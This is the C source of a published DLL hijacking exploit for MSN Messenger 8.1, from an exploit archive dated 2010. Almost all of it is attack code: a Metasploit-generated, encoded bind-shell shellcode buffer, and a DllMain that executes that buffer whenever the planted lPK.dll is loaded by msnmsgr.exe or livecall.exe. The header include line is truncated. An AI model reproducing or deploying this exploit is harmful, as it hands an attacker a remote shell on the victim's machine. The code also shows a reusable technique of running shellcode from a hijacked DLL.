/*
Exploit Title: MSN Messenger 8.1 DLL Hijacking Exploit (lPK.dll)
Date: Octobre 7, 2010
Author: Mu$lim redouan@live.ma
Version: 8.1
Tested on: Windows XP SP3 fr
File Vulnerable: 
- msnmsgr.exe
- livecall.exe
- 
*/

#include 
#define DllExport __declspec (dllexport)

/*
 * windows/shell_bind_tcp - 476 bytes
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * LPORT=1313, RHOST=, EXITFUNC=process, InitialAutoRunScript=, 
 * AutoRunScript=
 */
unsigned char buf[] = 
"\x33\xc9\xb1\x71\xd9\xcc\xd9\x74\x24\xf4\x5a\xb8\x8b\xf0\x6b"
"\x88\x31\x42\x14\x03\x42\x14\x83\xea\x77\x12\x9e\x51\x4b\x0a"
"\x15\x46\xa7\x13\x2e\xc4\x17\x2d\x90\xfa\x5e\x1c\x44\xcc\x17"
"\x46\x1a\xc1\x2b\x7b\x6b\x0b\xc9\xcb\x79\xf3\x02\x70\xa7\x1c"
"\x1a\x18\x5e\xea\x0e\x4c\x26\x6d\x61\x78\x82\x18\x2e\x5c\xb0"
"\x47\x78\xb2\xc4\x13\xa2\x2b\xfa\x10\xe4\x75\x67\xb5\x3c\x0f"
"\xd8\xbc\xef\xae\xdd\xf7\x7c\x02\x82\xd9\x94\x69\xf6\x52\x08"
"\xc3\xdd\x4d\x9f\x38\x1f\x4c\x58\x59\x99\x20\xce\x33\x2b\xe6"
"\x9e\x58\x2a\x15\x3a\xe7\xac\x30\x0f\xd9\x19\xf0\xbc\x96\xe1"
"\xc5\xdc\xfc\xe7\x42\x6e\x35\x16\x4a\xf8\x16\x82\x92\x75\xcd"
"\x72\xb0\x29\x9e\xe4\xad\xa0\x37\x18\x21\xf9\x5a\x28\xca\xc7"
"\x9e\xa3\x1d\xd5\xe7\xbe\xce\xb6\x58\x9a\x29\xdc\x1a\xba\x13"
"\x72\x13\x09\x87\x4c\x1c\xf4\x9a\x33\x30\x57\x38\x59\x4f\x63"
"\x4a\x8f\xdf\x2b\xc7\x3b\x4a\x2d\x22\x97\x08\x8d\xf0\x36\x57"
"\x04\x14\x71\x65\x45\x49\xf3\x0c\x20\xae\x9d\xef\xc1\xec\xe7"
"\xcb\x29\x4f\x12\x65\x23\x10\xb5\xbc\x8d\xa0\xaf\xc8\x72\x85"
"\x6c\x72\x2e\xe8\x22\x8f\x3b\x16\x40\x86\x68\x80\x7d\xaf\xf4"
"\xd1\xcd\xf6\x7e\xd5\x29\x45\xdb\x05\x92\x29\xc8\xe2\xb4\x13"
"\xfb\xeb\x3b\x9e\x9c\xfe\x62\xac\x9d\xa1\x5c\x9b\x40\x3f\x12"
"\xc6\x92\xf6\x5c\x16\xdb\x64\x62\xcd\x20\x58\x5f\x69\x71\x80"
"\x11\xa4\xde\x36\xf3\x73\x53\x86\x07\xba\x93\x68\x03\x99\xaf"
"\xf7\xd5\x91\x1f\xcb\xc3\x0e\x66\x94\xdc\x5a\x69\x57\xe3\x76"
"\x21\x98\x42\x03\x51\x0e\x59\x36\x6f\x8d\xca\x74\xfa\x6e\x45"
"\x1d\x97\x67\x4b\x6f\xc2\xa6\xeb\xe2\x6d\xc0\x1a\xe7\xae\x0b"
"\x40\xc5\xbe\x68\x96\xbb\x8e\xe3\x0f\x6e\xb4\x4e\x25\x14\xe0"
"\xd0\xa4\x5e\x63\xea\xb6\xec\x72\x47\xbb\xf2\x2d\x24\xce\xa1"
"\x5d\x4f\x3b\x15\xf7\x43\x09\x8d\x49\x29\xa6\x4e\xf2\x38\xcc"
"\x9c\x3f\x40\x37\x0d\x9d\xe6\x85\x77\xb4\x01\xf8\x66\x3f\x0a"
"\x04\x88\x79\x50\xeb\x51\xa7\xf6\x13\x98\x88\xe5\x92\x8b\x5d"
"\xc4\x69\x69\xdb\x3a\x19\x03\xf8\xf5\xde\x75\x17\x75\x1d\xd3"
"\x80\x55\xd3\x72\xcb\xd5\x04\x7c\x2d\xbd\xdd\x09\xee\x44\x57"
"\x5a\x72\x31\xac\xfb\x9b\xf9\x5f\x59\xb0\xfd";


BOOL WINAPI  DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    int (*func)();
	func = (int (*)()) buf;
	(int)(*func)();

  return 0;
}